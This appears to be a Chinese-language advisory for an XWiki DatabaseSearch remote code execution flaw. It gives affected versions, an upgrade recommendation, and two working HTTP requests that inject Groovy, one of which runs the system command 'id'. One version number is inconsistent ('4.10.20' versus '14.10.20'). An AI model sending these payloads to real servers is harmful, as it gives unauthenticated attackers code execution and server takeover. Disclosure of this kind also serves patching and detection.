字数 350，阅读大约需 2 分钟

系统介绍

XWiki是一个开源的企业级Wiki系统，它不仅支持Wiki功能，还提供了构建协作式Web应用的能力。XWiki的开发平台特性允许创建协作式Web应用，同时也提供了构建于平台之上的打包应用（第二代wiki）。

漏洞概述

从版本2.4-milestone-1开始，在版本4.10.20、15.5.4   和15.10-rc-1之前，XWiki的数据库搜索允许通过搜索⽂本远程执⾏代码。这允许公共wiki的任何访问者或封闭wiki的⽤⼾远程执⾏代码，因为默认情况下所有⽤⼾都可以访问数据库搜索。该漏洞源于DatabaseSearch  接口代码设置不当缺陷，导致未经身份验证的远程攻击者可以执行任意Groovy代码或任意系统指令，从而获取服务器权限。

漏洞影响范围

从 2.4-milestone-1到14.10.20 之前的版本

从 15.0-rc-1 到 15.5.4 之前的版本

从 15.6-rc-1 到 15.10-rc-1 之前的版本

漏洞复现

检测POC

GET/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20(333%20%2B%20333))%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20%20HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive

命令执行

GET/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Ddef%20command%20%3D%20%22id%22%3Bdef%20process%20%3D%20command.execute()%3Bprintln(%22Hello%20from%22%20%2B%20%22%20command%20output%3A%22%20%2B%20process.text.trim())%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7DHTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive

修复建议

官方已发布新版本修复漏洞，建议尽快升级到最新版本：https://www.xwiki.org